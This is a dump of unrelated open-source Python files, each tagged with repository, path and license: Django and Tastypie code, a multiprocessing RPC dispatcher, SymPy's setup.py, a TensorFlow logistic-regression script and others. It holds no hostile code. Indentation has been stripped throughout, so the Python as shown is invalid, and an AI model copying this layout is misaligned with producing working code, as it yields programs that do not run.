def slurp_fixture(path):
return open(os.path.join(os.path.dirname(__file__),
"fixtures", path), encoding='utf8').read()
def links_to_plain_text(links):
"""
Converts extracted links into text and cleans up extra whitespace. Only HTML
sections are converted. This is a helper to be used in tests.
@param links: Links obtained from such methods as extract_links_from_peer_assignment.
@type links: @see CourseraOnDemand._extract_links_from_text
@return: HTML converted to plain text with extra space removed.
@rtype: str
"""
result = []
for filetype, contents in iteritems(links):
if filetype != 'html':
continue
for content, _prefix in contents:
if content.startswith(IN_MEMORY_MARKER):
content = content[len(IN_MEMORY_MARKER):]
soup = BeautifulSoup(content)
[script.extract() for script in soup(["script", "style"])]
text = re.sub(r'[ \t\r\n]+', ' ', soup.get_text()).strip()
result.append(text)
return ''.join(result)
|
coursera-dl/coursera
|
coursera/test/utils.py
|
Python
|
lgpl-3.0
| 1,315
|
# -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [("podcasts", "0030_ordered_episode")]
operations = [
migrations.AddField(
model_name="podcast",
name="max_episode_order",
field=models.PositiveIntegerField(default=None, null=True),
preserve_default=True,
)
]
|
gpodder/mygpo
|
mygpo/podcasts/migrations/0031_podcast_max_episode_order.py
|
Python
|
agpl-3.0
| 409
|
from django.conf.urls import url
from projects.comments.views import CommentAdd, CommentEdit, CommentDelete
urlpatterns = [
# Create new comment
url(
r'^\/new',
CommentAdd.as_view(),
name='comment_add'
),
# Edit a specific comment
url(
r'^\/(?P<pk>\d+)/edit$',
CommentEdit.as_view(),
name='comment_edit'
),
# Delete a specific comment
url(
r'^\/(?P<pk>\d+)/delete$',
CommentDelete.as_view(),
name='comment_delete'
),
]
|
zurfyx/simple
|
simple/projects/comments/urls.py
|
Python
|
mit
| 531
|
import functools
import time
import traceback
from multiprocessing.util import Finalize
from threading import Event, RLock, Thread, current_thread
from pymp import logger, trace_function
from pymp.messages import DispatcherState, Request, Response, ProxyHandle, generate_id
from collections import deque
class State(object):
INIT, STARTUP, RUNNING, SHUTDOWN, TERMINATED = range(5)
class Dispatcher(object):
PREFIX = '#'
EXPOSED = '_dispatch_'
SPIN_TIME = 0.01
_dispatch_ = ['del_proxy', 'new_proxy']
@trace_function
def __init__(self, conn):
self._state = State.INIT
self._lock = RLock() # protects internal methods
self._queue = deque()
self._pending = dict() # id => Event or Response
self._provided_classes = dict() # string => (Class, callable)
self._consumed_classes = dict() # Class => Class
self._objects = dict()
self._thread = Thread(target=self._run, args=(conn,))
self._thread.daemon = True
self._thread.start()
# We register with multiprocessing to prevent bugs related to the
# order of execution of atexit functions & multiprocessing's join's
Finalize(self, self._atexit, exitpriority=100)
def get_state(self):
return self._state
def set_state(self, state):
with self._lock:
if state > self.state:
self._state = state
self._queue.append(DispatcherState(state)) # head of line
logger.info("Changing state to %d" % state)
elif state == self.state:
pass
else:
raise ValueError('Invalid state progression')
state = property(get_state, set_state)
@trace_function
def _atexit(self):
self.shutdown()
@trace_function
def __del__(self):
if self.alive():
self.shutdown()
self._thread.join()
self._objects.clear()
@trace_function
def provide(self, proxy_class, generator=None, name=None):
"""
Registers a class that will be provided by this dispatcher
        If present, a generator will be used in lieu of the provided
        class's default constructor.
"""
if not name:
name = proxy_class.__name__
with self._lock:
if name in self._provided_classes:
raise NameError("The name '%s' is already in use" % name)
self._provided_classes[name] = (proxy_class, generator)
@trace_function
def consume(self, name, proxy_client=None):
if hasattr(name, '__name__'):
name = name.__name__
with self._lock:
if hasattr(self, name):
raise NameError("The name '%s' is already in use" % name)
self._consumed_classes[name] = proxy_client or Proxy
def create_instance(*args, **kwargs):
new_proxy_args = (name, args, kwargs)
return self.call('#new_proxy', new_proxy_args)
setattr(self, name, create_instance)
def alive(self):
return self.state in (State.STARTUP, State.RUNNING, State.SHUTDOWN)
@trace_function
def call(self, function, args=[], kwargs={}, proxy_id=None, wait=True):
# Step 1: Send Request
request = Request(generate_id(), proxy_id, function, args, kwargs)
if wait:
event = Event()
with self._lock:
self._pending[request.id] = event
self._queue.appendleft(request)
# Step 2: Wait for Response
if wait:
event.wait()
else:
return
# Step 3: Process Response
with self._lock:
response = self._pending.pop(request.id, None)
if not isinstance(response, Response):
raise RuntimeError('Dispatcher stored invalid response')
elif response.exception:
raise response.exception
elif isinstance(response.return_value, ProxyHandle):
proxy_handle = response.return_value
try:
proxy_class = self._consumed_classes[proxy_handle.obj_type]
except KeyError:
logger.info("Recieved proxy_class for unexpected type %s" % proxy_handle.obj_type)
else:
return proxy_class(self, proxy_handle.id, proxy_handle.exposed)
else:
return response.return_value
@trace_function
def start(self):
if self.state is State.INIT:
self.state = State.STARTUP
if self.state is State.STARTUP:
while self.state is State.STARTUP:
time.sleep(self.SPIN_TIME)
@trace_function
def shutdown(self):
if self.state in (State.INIT, State.STARTUP, State.RUNNING):
self.state = State.SHUTDOWN
@trace_function
def _run(self, conn):
while self.state is State.INIT:
time.sleep(self.SPIN_TIME) # wait for the constructor to catch up
while self.state in (State.STARTUP, State.RUNNING):
self._write_once(conn)
self._read_once(conn, timeout=self.SPIN_TIME)
while len(self._queue) > 0:
self._write_once(conn) # send shutdown message if needed
self.state = State.TERMINATED
conn.close()
@trace_function
def join(self):
self._thread.join()
@trace_function
def new_proxy(self, name, args, kwargs):
with self._lock:
if name not in self._provided_classes:
raise NameError("%s does not name a provided class" % name)
source_class, generator = self._provided_classes[name]
if not generator:
generator = source_class
obj = generator(*args, **kwargs)
obj_id = id(obj)
obj_store, refcount = self._objects.get(obj_id, (obj, 0))
assert obj is obj_store, "Different objects returned for the same key"
self._objects[obj_id] = (obj, refcount + 1)
exposed = self._exposed_functions(obj)
return ProxyHandle(obj_id, name, exposed)
@trace_function
def del_proxy(self, proxy_id):
"""
Called by clients to signify when they no longer need a proxy
See: DefaultProxy.__del__
"""
with self._lock:
obj, refcount = self._objects.get(proxy_id, (None, 0))
if refcount <= 0:
logger.warn("Error destructing object %s, not found" % str(proxy_id))
elif refcount == 1:
del self._objects[proxy_id]
else:
self._objects[proxy_id] = (obj, refcount - 1)
def _write_once(self, conn):
if not self.alive():
return
try:
msg = self._queue.pop()
except IndexError:
return
try:
if isinstance(msg, DispatcherState) or self.state is State.RUNNING:
conn.send(msg)
else:
logger.info("Skipping outgoing message %s" % repr(msg))
except IOError:
self.state = State.TERMINATED
except Exception as exception:
# Most likely a PicklingError
if hasattr(msg, 'id'):
response = Response(msg.id, exception, None)
self._process_response(response)
def _read_once(self, conn, timeout=0):
if not self.alive() or not conn.poll(timeout):
return
try:
msg = conn.recv()
        except EOFError:
            self.state = State.TERMINATED
            return  # connection closed; nothing was received
if isinstance(msg, Request) and self.state is State.RUNNING:
response = self._process_request(msg)
if response:
self._queue.appendleft(response)
elif isinstance(msg, Response) and self.state is State.RUNNING:
self._process_response(msg)
elif isinstance(msg, DispatcherState):
if self.state is State.STARTUP and msg.state is State.STARTUP:
self.state = State.RUNNING
elif msg.state is State.SHUTDOWN:
self.state = msg.state
else:
logger.info("Skipping incoming message %s" % repr(msg))
return True
@trace_function
def _exposed_functions(self, obj):
exposed = getattr(obj, self.EXPOSED, None)
if exposed is None:
exposed = []
for name in dir(obj): # TODO: Not use dir
attribute = getattr(obj, name)
if callable(attribute) and not name.startswith('_'):
exposed.append(name)
setattr(obj, self.EXPOSED, exposed)
return exposed
@trace_function
def _callmethod(self, obj, fname, args, kwargs):
if fname in self._exposed_functions(obj):
function = getattr(obj, fname)
return function(*args, **kwargs)
else:
raise AttributeError("%s does not have an exposed method %s" % (repr(obj), fname))
@trace_function
def _process_request(self, request):
exception = None
fname = request.function
if fname.startswith(self.PREFIX):
obj = self # invoke methods on dispatcher
fname = fname[1:] # strip prefix
else:
with self._lock:
try:
obj, refcount = self._objects[request.proxy_id]
except KeyError:
exception = RuntimeError("No object found")
return Response(request.id, exception, None)
try:
value = self._callmethod(obj, fname, request.args, request.kwargs)
except Exception as exception:
logger.error("Exception thrown while processing response\nRemote " + traceback.format_exc())
return Response(request.id, exception, None)
else:
return Response(request.id, None, value)
@trace_function
def _process_response(self, response):
with self._lock:
event = self._pending.pop(response.id, None)
if hasattr(event, 'set'):
self._pending[response.id] = response
event.set()
class Proxy(object):
@trace_function
def __init__(self, dispatcher, proxy_id, exposed):
self._dispatcher = dispatcher
self._proxy_id = proxy_id
self._exposed = exposed
for name in exposed:
func = functools.partial(self._callmethod, name)
func.__name__ = name
setattr(self, name, func)
@trace_function
def _callmethod(self, name, *args, **kwargs):
return self._dispatcher.call(name, args, kwargs, proxy_id=self._proxy_id)
@trace_function
def __del__(self):
self._dispatcher.call('#del_proxy', (self._proxy_id,), wait=False)
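# Rough usage sketch (illustrative only; each Dispatcher normally lives in its
# own process connected by a multiprocessing Pipe, so the exact start-up
# choreography here is an assumption rather than a tested recipe):
#
#     class Counter(object):
#         def __init__(self):
#             self.n = 0
#         def increment(self):            # public methods are auto-exposed
#             self.n += 1
#             return self.n
#
#     # serving side:   server = Dispatcher(conn_a); server.provide(Counter); server.start()
#     # consuming side: client = Dispatcher(conn_b); client.consume(Counter); client.start()
#     #                 counter = client.Counter()   # Proxy for a remote Counter
#     #                 counter.increment()          # executed remotely via call()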
|
ekarulf/pymp
|
src/pymp/dispatcher.py
|
Python
|
mit
| 11,009
|
"""
:copyright: (c) 2011 Local Projects, all rights reserved
:license: Affero GNU GPL v3, see LICENSE for more details.
"""
"""
Extend the standard log module to enable some more detailed debug information.
"""
import os
import logging
import __main__
import logging.handlers
from config import Config
# Attempt to import lib from web, but not necessary
try:
from lib import web
except ImportError:
pass
class Info():
"""
Class to help extend logging functionality
"""
def __getitem__(self, name):
"""
Override get item to format IP addresses better, specifically add padding.
"""
if name == 'ip':
try:
ip = web.ctx.ip
if ip is None:
ip = "No IP Address"
except (AttributeError, NameError):
ip = "X.X.X.X"
ip = "%s%s" % (ip, ''.join(' ' for i in range(15 - len(ip))))
return ip
return self.__dict__.get(name, "?")
def __iter__(self):
"""
Override iter method to add the ip attribute
"""
keys = ['ip']
keys.extend(self.__dict__.keys())
return keys.__iter__()
# Set formatter for logging
formatter = logging.Formatter("%(asctime)s %(ip)s |%(levelname)s| %(message)s <%(filename)s:%(lineno)d>")
# Log identifier/file will be the same as the file being run
name = os.path.basename(__main__.__file__).split('.')[0]
log = logging.getLogger(name)
# Set log level to Debug (TODO: This should be pulled from config file)
log.setLevel(logging.DEBUG)
logfile = Config.get('logfile') # %s/../logs/%s.log' % (os.path.dirname(os.path.realpath(__file__)), name)
fh = logging.handlers.TimedRotatingFileHandler(logfile, 'midnight')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
log.addHandler(fh)
# Extend log module with Info class defined above.
log = logging.LoggerAdapter(log, Info())
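# Usage matches the standard logging API, e.g. (the import path is an
# assumption based on this file's location):
#
#     from framework.log import log
#     log.info("user logged in")
#
# which, with the formatter above, renders each record roughly as
# "<asctime> <padded ip> |INFO| user logged in <filename:lineno>"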
|
codeforamerica/Change-By-Us
|
framework/log.py
|
Python
|
agpl-3.0
| 2,004
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import mrp_production_sequence
|
sysadminmatmoz/odoo-clearcorp
|
TODO-7.0/mrp_production_sequence/__init__.py
|
Python
|
agpl-3.0
| 1,061
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import pkgutil
import pkg_resources
from raven import Client
def get_modules():
resolved = {}
modules = [mod[1] for mod in tuple(pkgutil.iter_modules())]
for module in modules:
try:
res_mod = pkg_resources.get_distribution(module)
if res_mod is not None:
resolved[module] = res_mod.version
except pkg_resources.DistributionNotFound:
pass
return resolved
class SentryErrorHandler(object):
def __init__(self, config):
self.config = config
if self.config.USE_SENTRY:
self.sentry = Client(self.config.SENTRY_DSN_URL)
self.modules = get_modules()
def handle_exception(self, typ, value, tb, extra={}):
if self.config.USE_SENTRY:
self.sentry.captureException(
(typ, value, tb),
extra=extra,
data={
'modules': self.modules
}
)
|
holmes-app/holmes-api
|
holmes/error_handlers/sentry.py
|
Python
|
mit
| 1,015
|
#!/usr/bin/env python
"""Distutils based setup script for SymPy.
This uses Distutils (http://python.org/sigs/distutils-sig/) the standard
python mechanism for installing packages. Optionally, you can use
Setuptools (http://pythonhosted.org/setuptools/setuptools.html) to automatically
handle dependencies. For the easiest installation
just type the command (you'll probably need root privileges for that):
python setup.py install
This will install the library in the default location. For instructions on
how to customize the install procedure read the output of:
python setup.py --help install
In addition, there are some other commands:
python setup.py clean -> will clean all trash (*.pyc and stuff)
python setup.py test -> will run the complete test suite
python setup.py bench -> will run the complete benchmark suite
python setup.py audit -> will run pyflakes checker on source code
To get a full list of available commands, read the output of:
python setup.py --help-commands
Or, if all else fails, feel free to write to the sympy list at
sympy@googlegroups.com and ask for help.
"""
import sys
import subprocess
import os
import shutil
import glob
mpmath_version = '0.19'
# This directory
dir_setup = os.path.dirname(os.path.realpath(__file__))
try:
from setuptools import setup, Command
except ImportError:
from distutils.core import setup, Command
# handle mpmath deps in the hard way:
from distutils.version import LooseVersion
try:
import mpmath
if mpmath.__version__ < LooseVersion(mpmath_version):
raise ImportError
except ImportError:
print("Please install the mpmath package with a version >= %s" % mpmath_version)
sys.exit(-1)
PY3 = sys.version_info[0] > 2
# Make sure I have the right Python version.
if sys.version_info[:2] < (2, 7):
print("SymPy requires Python 2.7 or newer. Python %d.%d detected" % sys.version_info[:2])
sys.exit(-1)
# Check that this list is uptodate against the result of the command:
# python bin/generate_module_list.py
modules = [
'sympy.assumptions',
'sympy.assumptions.handlers',
'sympy.benchmarks',
'sympy.calculus',
'sympy.categories',
'sympy.codegen',
'sympy.combinatorics',
'sympy.concrete',
'sympy.core',
'sympy.core.benchmarks',
'sympy.crypto',
'sympy.deprecated',
'sympy.diffgeom',
'sympy.external',
'sympy.functions',
'sympy.functions.combinatorial',
'sympy.functions.elementary',
'sympy.functions.elementary.benchmarks',
'sympy.functions.special',
'sympy.functions.special.benchmarks',
'sympy.geometry',
'sympy.holonomic',
'sympy.integrals',
'sympy.integrals.benchmarks',
'sympy.interactive',
'sympy.liealgebras',
'sympy.logic',
'sympy.logic.algorithms',
'sympy.logic.utilities',
'sympy.matrices',
'sympy.matrices.benchmarks',
'sympy.matrices.expressions',
'sympy.ntheory',
'sympy.parsing',
'sympy.physics',
'sympy.physics.continuum_mechanics',
'sympy.physics.hep',
'sympy.physics.mechanics',
'sympy.physics.optics',
'sympy.physics.quantum',
'sympy.physics.unitsystems',
'sympy.physics.unitsystems.systems',
'sympy.physics.vector',
'sympy.plotting',
'sympy.plotting.intervalmath',
'sympy.plotting.pygletplot',
'sympy.polys',
'sympy.polys.agca',
'sympy.polys.benchmarks',
'sympy.polys.domains',
'sympy.printing',
'sympy.printing.pretty',
'sympy.sandbox',
'sympy.series',
'sympy.series.benchmarks',
'sympy.sets',
'sympy.simplify',
'sympy.solvers',
'sympy.solvers.benchmarks',
'sympy.stats',
'sympy.strategies',
'sympy.strategies.branch',
'sympy.tensor',
'sympy.tensor.array',
'sympy.unify',
'sympy.utilities',
'sympy.utilities.mathml',
'sympy.vector',
]
class audit(Command):
"""Audits SymPy's source code for following issues:
- Names which are used but not defined or used before they are defined.
- Names which are redefined without having been used.
"""
description = "Audit SymPy source with PyFlakes"
user_options = []
def initialize_options(self):
self.all = None
def finalize_options(self):
pass
def run(self):
import os
try:
import pyflakes.scripts.pyflakes as flakes
except ImportError:
print("In order to run the audit, you need to have PyFlakes installed.")
sys.exit(-1)
dirs = (os.path.join(*d) for d in (m.split('.') for m in modules))
warns = 0
for dir in dirs:
for filename in os.listdir(dir):
if filename.endswith('.py') and filename != '__init__.py':
warns += flakes.checkPath(os.path.join(dir, filename))
if warns > 0:
print("Audit finished with total %d warnings" % warns)
class clean(Command):
"""Cleans *.pyc and debian trashs, so you should get the same copy as
is in the VCS.
"""
description = "remove build files"
user_options = [("all", "a", "the same")]
def initialize_options(self):
self.all = None
def finalize_options(self):
pass
def run(self):
curr_dir = os.getcwd()
for root, dirs, files in os.walk(dir_setup):
for file in files:
                if file.endswith('.pyc') and os.path.isfile(os.path.join(root, file)):
os.remove(os.path.join(root, file))
os.chdir(dir_setup)
names = ["python-build-stamp-2.4", "MANIFEST", "build", "dist", "doc/_build", "sample.tex"]
for f in names:
if os.path.isfile(f):
os.remove(f)
elif os.path.isdir(f):
shutil.rmtree(f)
for name in glob.glob(os.path.join(dir_setup, "doc", "src", "modules", \
"physics", "vector", "*.pdf")):
if os.path.isfile(name):
os.remove(name)
os.chdir(curr_dir)
class test_sympy(Command):
"""Runs all tests under the sympy/ folder
"""
description = "run all tests and doctests; also see bin/test and bin/doctest"
user_options = [] # distutils complains if this is not here.
def __init__(self, *args):
self.args = args[0] # so we can pass it to other classes
Command.__init__(self, *args)
def initialize_options(self): # distutils wants this
pass
def finalize_options(self): # this too
pass
def run(self):
from sympy.utilities import runtests
runtests.run_all_tests()
class run_benchmarks(Command):
"""Runs all SymPy benchmarks"""
description = "run all benchmarks"
user_options = [] # distutils complains if this is not here.
def __init__(self, *args):
self.args = args[0] # so we can pass it to other classes
Command.__init__(self, *args)
def initialize_options(self): # distutils wants this
pass
def finalize_options(self): # this too
pass
# we use py.test like architecture:
#
# o collector -- collects benchmarks
# o runner -- executes benchmarks
# o presenter -- displays benchmarks results
#
# this is done in sympy.utilities.benchmarking on top of py.test
def run(self):
from sympy.utilities import benchmarking
benchmarking.main(['sympy'])
# Check that this list is uptodate against the result of the command:
# python bin/generate_test_list.py
tests = [
'sympy.assumptions.tests',
'sympy.calculus.tests',
'sympy.categories.tests',
'sympy.codegen.tests',
'sympy.combinatorics.tests',
'sympy.concrete.tests',
'sympy.core.tests',
'sympy.crypto.tests',
'sympy.deprecated.tests',
'sympy.diffgeom.tests',
'sympy.external.tests',
'sympy.functions.combinatorial.tests',
'sympy.functions.elementary.tests',
'sympy.functions.special.tests',
'sympy.geometry.tests',
'sympy.holonomic.tests',
'sympy.integrals.tests',
'sympy.interactive.tests',
'sympy.liealgebras.tests',
'sympy.logic.tests',
'sympy.matrices.expressions.tests',
'sympy.matrices.tests',
'sympy.ntheory.tests',
'sympy.parsing.tests',
'sympy.physics.continuum_mechanics.tests',
'sympy.physics.hep.tests',
'sympy.physics.mechanics.tests',
'sympy.physics.optics.tests',
'sympy.physics.quantum.tests',
'sympy.physics.tests',
'sympy.physics.unitsystems.tests',
'sympy.physics.vector.tests',
'sympy.plotting.intervalmath.tests',
'sympy.plotting.pygletplot.tests',
'sympy.plotting.tests',
'sympy.polys.agca.tests',
'sympy.polys.domains.tests',
'sympy.polys.tests',
'sympy.printing.pretty.tests',
'sympy.printing.tests',
'sympy.sandbox.tests',
'sympy.series.tests',
'sympy.sets.tests',
'sympy.simplify.tests',
'sympy.solvers.tests',
'sympy.stats.tests',
'sympy.strategies.branch.tests',
'sympy.strategies.tests',
'sympy.tensor.array.tests',
'sympy.tensor.tests',
'sympy.unify.tests',
'sympy.utilities.tests',
'sympy.vector.tests',
]
long_description = '''SymPy is a Python library for symbolic mathematics. It aims
to become a full-featured computer algebra system (CAS) while keeping the code
as simple as possible in order to be comprehensible and easily extensible.
SymPy is written entirely in Python.'''
with open(os.path.join(dir_setup, 'sympy', 'release.py')) as f:
# Defines __version__
exec(f.read())
with open(os.path.join(dir_setup, 'sympy', '__init__.py')) as f:
long_description = f.read().split('"""')[1]
if __name__ == '__main__':
setup(name='sympy',
version=__version__,
description='Computer algebra system (CAS) in Python',
long_description=long_description,
author='SymPy development team',
author_email='sympy@googlegroups.com',
license='BSD',
keywords="Math CAS",
url='http://sympy.org',
packages=['sympy'] + modules + tests,
scripts=['bin/isympy'],
ext_modules=[],
package_data={
'sympy.utilities.mathml': ['data/*.xsl'],
'sympy.logic.benchmarks': ['input/*.cnf'],
},
data_files=[('share/man/man1', ['doc/man/isympy.1'])],
cmdclass={'test': test_sympy,
'bench': run_benchmarks,
'clean': clean,
'audit': audit},
classifiers=[
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Scientific/Engineering :: Physics',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
install_requires=['mpmath>=%s' % mpmath_version]
)
|
postvakje/sympy
|
setup.py
|
Python
|
bsd-3-clause
| 11,430
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2014 Savoir-faire Linux
# (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, orm
from openerp.tools.translate import _
class vehicle_category(orm.Model):
"""Vehicle Category"""
_description = _(__doc__)
_name = 'vehicle.category'
_columns = {
'name': fields.char('Name', required=True, select=True,
help='Name of motor vehicle category.'),
}
|
houssine78/vertical-travel-porting-v8-wip
|
motor_vehicle/vehicle_category.py
|
Python
|
agpl-3.0
| 1,375
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 30 16:04:08 2017
@author: 오연택
"""
import tensorflow as tf
import numpy as np
xy = np.loadtxt('train.txt', unpack=True, dtype='float32')
x_data = xy[0:-1]
y_data = xy[-1]
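# With unpack=True, np.loadtxt transposes the file, so each row of xy is one
# column of train.txt. x_data therefore holds every feature column and y_data
# the label column; the first feature row is assumed to be a constant 1 acting
# as the bias term, matching the feed values used for prediction below.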
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
W = tf.Variable(tf.random_uniform([1, len(x_data)], -1.0, 1.0))
# Our hypothesis: the sigmoid of the linear combination matmul(W, X)
h = tf.matmul(W,X)
hypothesis = tf.div(1., 1.+tf.exp(-h))
#cost function
cost = -tf.reduce_mean(Y * tf.log(hypothesis) + (1 - Y) * tf.log(1 - hypothesis))
#Minimize
a = tf.Variable(0.1) # learning rate, alpha
optimizer = tf.train.GradientDescentOptimizer(a)
train = optimizer.minimize(cost) # goal is minimize cost
init = tf.initialize_all_variables()
sess = tf.Session()
sess.run(init)
for step in range(2001):
sess.run(train, feed_dict={X: x_data, Y: y_data})
if step % 20 == 0:
print(step, sess.run(cost, feed_dict={X: x_data, Y: y_data}), sess.run(W))
print("------------------------------------------------------------------")
print(sess.run(hypothesis, feed_dict={X:[[1], [2], [2]]})>0.5)
print(sess.run(hypothesis, feed_dict={X:[[1], [5], [5]]})>0.5)
print(sess.run(hypothesis, feed_dict={X:[[1,1], [4,3], [3,5]]})>0.5)
|
yeontaek/Basic-of-Tensorflow
|
04.Logistic Classification/01.logistic_classification.py
|
Python
|
apache-2.0
| 1,237
|
import pdb
import logging
import sys
from tastypie import fields, http
from tastypie.resources import ModelResource
from tastypie.authentication import ApiKeyAuthentication, Authentication, SessionAuthentication, MultiAuthentication
from tastypie.exceptions import NotFound
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from tastypie.contrib.contenttypes.fields import GenericForeignKeyField
from tastypie.utils import trailing_slash
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.db.models import Max, Count
from django.contrib.contenttypes.models import ContentType
from django.core.cache import cache
from django.conf.urls import url
from core.permissions import StoryAuthorization, PieceAuthorization, ActivityAuthorization
from core.paginator import StoryPaginator
from core.models import RemoteObject, Story, Piece, Activity, StoryUserAccess, StoryGroupAccess
from accounts.views import register_by_access_token
from accounts.models import BanyanUser, BanyanUserNotifications
from accounts.api import BanyanUserResource
from accounts.permissions import BanyanUserNotificationsAuthorization
from content_feedback.models import HiddenObject
from access_groups.models import PublicGroupDesc
# Get an instance of a logger
logger = logging.getLogger(__name__)
class RemoteObjectResource(ModelResource):
author = fields.ForeignKey('accounts.api.BanyanUserResource', 'author', full=True)
perma_link = fields.CharField(readonly = True)
class Meta:
always_return_data = True
abstract = True
ordering = ['timeStamp']
def dehydrate_media(self, bundle):
return bundle.obj.media
def dehydrate_location(self, bundle):
return bundle.obj.location
class StoryResource(RemoteObjectResource):
permission = fields.DictField(null=False, blank=False, readonly=True)
pieces = fields.ToManyField('core.api.PieceResource',
attribute="pieces",
full=True, null=True, blank=True, readonly=True)
stats = fields.DictField(null=True, blank=True, readonly = True)
class Meta(RemoteObjectResource.Meta):
queryset = Story.objects.select_related()
authentication = MultiAuthentication(ApiKeyAuthentication(), SessionAuthentication(), Authentication())
authorization = StoryAuthorization()
paginator_class = StoryPaginator
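    # Visibility rules implemented below: authenticated users see their own
    # stories minus any they have explicitly hidden, while anonymous users
    # only see stories shared with the public group.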
def get_object_list(self, request):
story_queryset = Story.objects.none()
if request.user.is_authenticated():
story_queryset = request.user.stories.all()
cache_key = '%s:%s' % (str(request.user.id), HiddenObject.HIDDEN_STORIES_ID_LIST_CACHE_KEY)
hidden_stories_id_list = cache.get(cache_key)
if hidden_stories_id_list is None:
ctype = ContentType.objects.get(app_label="core", model="story")
hidden_stories_qs = HiddenObject.objects.filter(content_type = ctype, user = request.user)
hidden_stories_id_list = hidden_stories_qs.values_list('object_id', flat=True)
cache.set(cache_key, hidden_stories_id_list, None) # timeout forever
remaining_stories_qs = story_queryset.exclude(pk__in = hidden_stories_id_list)
return remaining_stories_qs
else:
public_groupdesc, created = PublicGroupDesc.objects.get_or_create()
publicgroup = public_groupdesc.group()
story_queryset = publicgroup.stories.all()
return story_queryset
def dehydrate_pieces(self, bundle):
piece_bundles = bundle.data.get("pieces")
user = bundle.request.user
        # pieces is an array; iterate over a copy so that removing flagged
        # pieces does not skip elements of the list being mutated
        for piece_bundle in list(piece_bundles):
            #if this content should not be returned, don't return it
            if piece_bundle.obj.is_flagged(user):
                piece_bundles.remove(piece_bundle)
        return piece_bundles
def dehydrate_permission(self, bundle):
story = bundle.obj
user = bundle.request.user
if user.is_authenticated():
try:
storyuseraccess = StoryUserAccess.objects.get(story=story, user=user)
return storyuseraccess.api_dict()
except StoryUserAccess.DoesNotExist:
return {"canRead":False, "canWrite":False, "isInvited":False}
else:
public_groupdesc, created = PublicGroupDesc.objects.get_or_create()
publicgroup = public_groupdesc.group()
if (StoryGroupAccess.objects.filter(story=story, group=publicgroup).exists()):
return {"canRead":True, "canWrite":False, "isInvited":False}
else:
return {"canRead":False, "canWrite":False, "isInvited":False}
def dehydrate_writeAccess(self, bundle):
return bundle.obj.writeAccess
def dehydrate_readAccess(self, bundle):
return bundle.obj.readAccess
def dehydrate_perma_link(self, bundle):
storyId = bundle.obj.bnObjectId
link = reverse("story_short", args=(storyId,))
return bundle.request.build_absolute_uri(link)
def dehydrate_stats(self, bundle):
# Get the queryset first so that it can be cached
all_activities = bundle.obj.activities.all()
numViews = all_activities.filter(type=Activity.VIEW).count()
followActivityUri = None
if bundle.request.user.is_authenticated():
user_activities = all_activities.filter(user = bundle.request.user)
userViewed = user_activities.filter(type=Activity.VIEW).count() > 0
try:
activity = user_activities.get(type=Activity.FOLLOW_STORY)
activityResource = ActivityResource()
followActivityUri = activityResource.get_resource_uri(activity)
except Activity.DoesNotExist:
followActivityUri = None
except:
logger.error("core.api.dehydrate_stats {}{}".format(sys.exc_info()[0], sys.exc_info()[1]))
pass
else:
userViewed = False
return {"numViews":numViews, "userViewed":userViewed, "followActivity":followActivityUri}
class PieceResource(RemoteObjectResource):
story = fields.ForeignKey(StoryResource, 'story')
stats = fields.DictField(null=True, blank=True, readonly = True)
class Meta(RemoteObjectResource.Meta):
queryset = Piece.objects.select_related()
authentication = MultiAuthentication(ApiKeyAuthentication(), Authentication())
authorization = PieceAuthorization()
filtering = {
'story': ALL_WITH_RELATIONS,
'user': ALL_WITH_RELATIONS,
'timeStamp': ['exact', 'gt', 'gte', 'lt', 'lte', 'range']
}
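    # Custom endpoint: a GET on <piece detail URL>/like/ returns the 'like'
    # activities recorded for that piece (see get_piece_likes below).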
def prepend_urls(self):
return [
url(r"^(?P<resource_name>%s)/(?P<pk>\w[\w/-]*)/like%s$" % (self._meta.resource_name, trailing_slash()), self.wrap_view('get_piece_likes'), name="api_get_piece_likes"),
]
def get_piece_likes(self, request, **kwargs):
pk = kwargs['pk']
try:
bundle = self.build_bundle(data={'pk': pk}, request=request)
obj = self.cached_obj_get(bundle=bundle, **self.remove_api_resource_names(kwargs))
except ObjectDoesNotExist:
return http.HttpGone()
except MultipleObjectsReturned:
return http.HttpMultipleChoices("More than one resource is found at this URI.")
activities_resource = ActivityResource()
return activities_resource.get_list(request, object_id = pk, content_type = ContentType.objects.get_for_model(bundle.obj), type='like')
def dehydrate_perma_link(self, bundle):
pieceId = bundle.obj.bnObjectId
link = reverse("piece_short", args=(pieceId,))
